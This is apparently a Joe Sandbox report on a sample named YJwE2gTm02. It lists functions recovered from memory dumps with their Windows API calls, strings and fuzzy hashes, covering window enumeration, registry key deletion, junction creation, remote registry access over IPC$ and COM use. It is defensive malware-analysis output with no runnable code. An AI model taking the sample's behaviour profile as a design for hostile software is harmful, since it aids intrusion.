_wcsstr.LIBVCRUNTIME ref: 00964A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00964A64
GetWindowTextW.USER32(?,?,00000400), ref: 00964A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00964AE6
GetClassNameW.USER32(?,?,00000400), ref: 00964B20
GetWindowRect.USER32(?,?), ref: 00964B8B

Strings

ThumbnailClass, xrefs: 00964A6F, 00964AF1

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 014c1fcc179e88cef190a2ff3aceec0332effc3c0b4f1c92022c2f697494abaf
Instruction ID: 104dc8f8bf62bbee6de0abf367282c04cc2fef4d4fc9062ca0a8b16071c6f12e
Opcode Fuzzy Hash: 014c1fcc179e88cef190a2ff3aceec0332effc3c0b4f1c92022c2f697494abaf
Instruction Fuzzy Hash: B891CE71008206AFDB04DFA4C981FAA77ECFF84754F04846AFD869A196DB34ED45CBA1

Function 00998D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00919BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00919BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00998D5A
GetFocus.USER32 ref: 00998D6A
GetDlgCtrlID.USER32(00000000), ref: 00998D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00998E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00998ECF
GetMenuItemCount.USER32(?), ref: 00998EEC
GetMenuItemID.USER32(?,00000000), ref: 00998EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00998F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00998F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00998FA1

Strings

0, xrefs: 00998E9F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: e33315a6b76b82a29a71405119a20459ff6a09fe5f1ab6cea19f32c71f16fa24
Instruction ID: 6fa37ea7c488ca91d82bfe03d7fa7af3ffe599101e9bff34331ad10242589b31
Opcode Fuzzy Hash: e33315a6b76b82a29a71405119a20459ff6a09fe5f1ab6cea19f32c71f16fa24
Instruction Fuzzy Hash: CC81CD71508301AFDF10DF28DC84AABBBE9FB8A714F14091EF98597291DB30D940DBA2

Function 0096DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0096DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0096DC46
_wcslen.LIBCMT ref: 0096DC50
_wcsstr.LIBVCRUNTIME ref: 0096DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0096DCBC

Strings

04090000, xrefs: 0096DCF2
DefaultLangCodepage, xrefs: 0096DD1F
\VarFileInfo\Translation, xrefs: 0096DCB4
%u.%u.%u.%u, xrefs: 0096DD9A
StringFileInfo\, xrefs: 0096DC8F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 5a0c807cf4a49927ed532c78849922bb4c879458968b26f1935cdb5ea03e8bb6
Instruction ID: 466b5163dbfcf4d5cf4f073d046e71108a2f92a5d284aa95ff796e3d3070627f
Opcode Fuzzy Hash: 5a0c807cf4a49927ed532c78849922bb4c879458968b26f1935cdb5ea03e8bb6
Instruction Fuzzy Hash: 6441F272A402187AEB10BB64AC53FFF77ACEF85724F10006AF901A61C2EB74D90197A5

Function 0098CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0098CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0098CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0098CD48

Part of subcall function 0098CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0098CCAA
Part of subcall function 0098CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0098CCBD
Part of subcall function 0098CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0098CCCF
Part of subcall function 0098CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0098CD05
Part of subcall function 0098CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0098CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0098CCF3

Strings

RegDeleteKeyExW, xrefs: 0098CCC9
advapi32.dll, xrefs: 0098CCB8

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: f67d93559860c8a1c63d03e19e88bd7d0378859c109c8a9bc423449df096f146
Instruction ID: f708309db4dc0e34a010f0a2ef150cf8aeb062df615b82d4726d1b298574988b
Opcode Fuzzy Hash: f67d93559860c8a1c63d03e19e88bd7d0378859c109c8a9bc423449df096f146
Instruction Fuzzy Hash: 233181B1905128BBDB20AB55DC88EFFBB7CEF45740F000566B905E3240D7349A45EBB0

Function 00973D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00973D40
_wcslen.LIBCMT ref: 00973D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00973D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00973DBE
RemoveDirectoryW.KERNEL32(?), ref: 00973DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00973E55
CloseHandle.KERNEL32(00000000), ref: 00973E60
CloseHandle.KERNEL32(00000000), ref: 00973E6B

Strings

\, xrefs: 00973D77
\??\%s, xrefs: 00973D5B
:, xrefs: 00973D82

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: f7269b7661c0d2e4c5f56d461255683816c45354936eaf97656e93752892e23f
Instruction ID: fc1a2a358cb88ab07385dff4901b9d6a290942feb901343c1f5d1d264757b17c
Opcode Fuzzy Hash: f7269b7661c0d2e4c5f56d461255683816c45354936eaf97656e93752892e23f
Instruction Fuzzy Hash: 2E31C4B2914219ABDB209FA4DC49FEF37BCEF88700F1081B6F519D60A0E77497449B24

Function 0096E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0096E6B4

Part of subcall function 0091E551: timeGetTime.WINMM(?,?,0096E6D4), ref: 0091E555

Sleep.KERNEL32(0000000A), ref: 0096E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0096E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0096E727
SetActiveWindow.USER32 ref: 0096E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0096E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0096E773
Sleep.KERNEL32(000000FA), ref: 0096E77E
IsWindow.USER32 ref: 0096E78A
EndDialog.USER32(00000000), ref: 0096E79B

Strings

BUTTON, xrefs: 0096E719

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: aac4d2e6e978a0daa244ce6fc1967d0fa49fd78c77b78997358f5e77279cb051
Instruction ID: 90762c9c439d072ca87778420cfad413985206d80d91c49d4c319b6e0d2d9505
Opcode Fuzzy Hash: aac4d2e6e978a0daa244ce6fc1967d0fa49fd78c77b78997358f5e77279cb051
Instruction Fuzzy Hash: B021C0B52AC305AFEB015F68EC89B2A3B6DFB64349F504427F401821A1DB71AC40BB25

Function 0096E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0096EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0096EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0096EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0096EAA7

Strings

status PlayMe mode, xrefs: 0096EA58
play PlayMe, xrefs: 0096EAA2
open , xrefs: 0096EA0C
close PlayMe, xrefs: 0096EA6E, 0096EA9B
play PlayMe wait, xrefs: 0096EA91
alias PlayMe, xrefs: 0096EA36

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 7cdf75b575d04884365dd023245865bce4aebd289038e39468d8ff3133f61946
Instruction ID: bfcca3a9b1fb2f8a43b68f21d7c1bd9010de4737e751985962f941b28a99c6fe
Opcode Fuzzy Hash: 7cdf75b575d04884365dd023245865bce4aebd289038e39468d8ff3133f61946
Instruction Fuzzy Hash: 1F117075A902697DD720A7A5DD4AFFF6A7CEFD1F04F40042AB811A20D1EEB04905C6B1

Function 00965CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00965CE2
GetWindowRect.USER32(00000000,?), ref: 00965CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00965D59
GetDlgItem.USER32(?,00000002), ref: 00965D69
GetWindowRect.USER32(00000000,?), ref: 00965D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00965DCF
GetDlgItem.USER32(?,000003E9), ref: 00965DDD
GetWindowRect.USER32(00000000,?), ref: 00965DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00965E31
GetDlgItem.USER32(?,000003EA), ref: 00965E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00965E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00965E67

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: c0b2f98b35b1673b7a364f33eb0137e6c5354cd130c0fcf805681772b388d9b2
Instruction ID: 90afd739af84ecc1bc417fb5204e033ad70d57957976003ba77a1e87177373de
Opcode Fuzzy Hash: c0b2f98b35b1673b7a364f33eb0137e6c5354cd130c0fcf805681772b388d9b2
Instruction Fuzzy Hash: 6B511EB1B10605AFDF18CFA8DD99AAEBBB9FB48300F558129F515E7294D7709E00CB60

Function 00918BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00918F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00918BE8,?,00000000,?,?,?,?,00918BBA,00000000,?), ref: 00918FC5

DestroyWindow.USER32(?), ref: 00918C81
KillTimer.USER32(00000000,?,?,?,?,00918BBA,00000000,?), ref: 00918D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00956973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00918BBA,00000000,?), ref: 009569A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00918BBA,00000000,?), ref: 009569B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00918BBA,00000000), ref: 009569D4
DeleteObject.GDI32(00000000), ref: 009569E6

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 049d70f189cbe3255c7b1829eb9f81cf9845f07494c79c28323f04fec7b5a4f4
Instruction ID: 9884d59cfee5b62356f72be70f957b35e5da95009fe390804859a212166741e2
Opcode Fuzzy Hash: 049d70f189cbe3255c7b1829eb9f81cf9845f07494c79c28323f04fec7b5a4f4
Instruction Fuzzy Hash: 9661CD31616704EFDB25CF19E958BAA77F5FB40312F50491AE482975A0CB35A8C4FF90

Function 00919838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00919944: GetWindowLongW.USER32(?,000000EB), ref: 00919952

GetSysColor.USER32(0000000F), ref: 00919862

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 4a2f1f7aa74b3fed6e765acb7b7adfe7dd81b313ecb90c9041eabc191aa647b3
Instruction ID: 30654424726894c8764dfa3f26f52972f890f4b5581ab9c1fc458637c6da3f9f
Opcode Fuzzy Hash: 4a2f1f7aa74b3fed6e765acb7b7adfe7dd81b313ecb90c9041eabc191aa647b3
Instruction Fuzzy Hash: D441A371208648AFDB209F3C9C94BF93BA9BB06331F144656F9B2871E1D7319D82EB11

Function 009696E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0094F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00969717
LoadStringW.USER32(00000000,?,0094F7F8,00000001), ref: 00969720

Part of subcall function 00909CB3: _wcslen.LIBCMT ref: 00909CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0094F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00969742
LoadStringW.USER32(00000000,?,0094F7F8,00000001), ref: 00969745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00969866

Strings

Line %d (File "%s"):, xrefs: 0096978F
Line %d:, xrefs: 009697A0
%s (%d) : ==> %s: %s %s, xrefs: 0096984A
^ ERROR, xrefs: 009697FB
Error: , xrefs: 0096981D

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: baa1f672e74b7d6b8514ed474daa832d8afb786d0cfbb184f63d0564f3633c15
Instruction ID: 4b54b1c97503f390cf5627a2bd5ff440feccbf4f04f9da0a753237e74bb3e43b
Opcode Fuzzy Hash: baa1f672e74b7d6b8514ed474daa832d8afb786d0cfbb184f63d0564f3633c15
Instruction Fuzzy Hash: A9414A72904219AEDF04EBE0DE86FEEB77DAF94340F504065B605B2092EB356F48CB61

Function 009606DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00906B57: _wcslen.LIBCMT ref: 00906B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009607A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009607BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009607DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00960804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0096082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00960837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0096083C

Strings

\CLSID, xrefs: 00960724
\IPC$, xrefs: 00960784
SOFTWARE\Classes\, xrefs: 0096070E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 52b00589ff39f33f520bc723570e53ca7aaaf23c091ca9abc9cde6b969370d56
Instruction ID: 1b649284f33dad909ca8b01f25ddd40b9bd6fbe6e06930faba70214acc587b09
Opcode Fuzzy Hash: 52b00589ff39f33f520bc723570e53ca7aaaf23c091ca9abc9cde6b969370d56
Instruction Fuzzy Hash: 59410A72C10229AFDF15EBA4DC95DEEB778FF84750F444169E901A31A1EB305E44CBA0

Function 00983C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00983C5C
CoInitialize.OLE32(00000000), ref: 00983C8A
CoUninitialize.OLE32 ref: 00983C94
_wcslen.LIBCMT ref: 00983D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00983DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00983ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00983F0E
CoGetObject.OLE32(?,00000000,0099FB98,?), ref: 00983F2D
SetErrorMode.KERNEL32(00000000), ref: 00983F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00983FC4
VariantClear.OLEAUT32(?), ref: 00983FD8

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 9ccb3e1ebe884f45118e991f27fb77fbf12cd4662c29196de29a259d431129a4
Instruction ID: 34e52cfba871f3938d8d0949d3d90bfb2d7aaeeca2224bafcba37daafdc55700
Opcode Fuzzy Hash: 9ccb3e1ebe884f45118e991f27fb77fbf12cd4662c29196de29a259d431129a4
Instruction Fuzzy Hash: 1AC125716082059FD700EF68C88492BB7E9FF89B44F14891DF98A9B351D731ED05CB92

Function 00977A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00977AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00977B8F
SHGetDesktopFolder.SHELL32(?), ref: 00977BA3
CoCreateInstance.OLE32(0099FD08,00000000,00000001,009C6E6C,?), ref: 00977BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00977C74
CoTaskMemFree.OLE32(?,?), ref: 00977CCC
SHBrowseForFolderW.SHELL32(?), ref: 00977D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00977D7A
CoTaskMemFree.OLE32(00000000), ref: 00977D81
CoTaskMemFree.OLE32(00000000), ref: 00977DD6
CoUninitialize.OLE32 ref: 00977DDC

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 57b4ce0731c8a8bd579bbb5fa0f7a66ec0cc7d17cd90d530ac552693cf94299c
Instruction ID: 75250eb813c554b0066f88a31dc87a0c205100a303ef72c271aca4ae86e718cb
Opcode Fuzzy Hash: 57b4ce0731c8a8bd579bbb5fa0f7a66ec0cc7d17cd90d530ac552693cf94299c
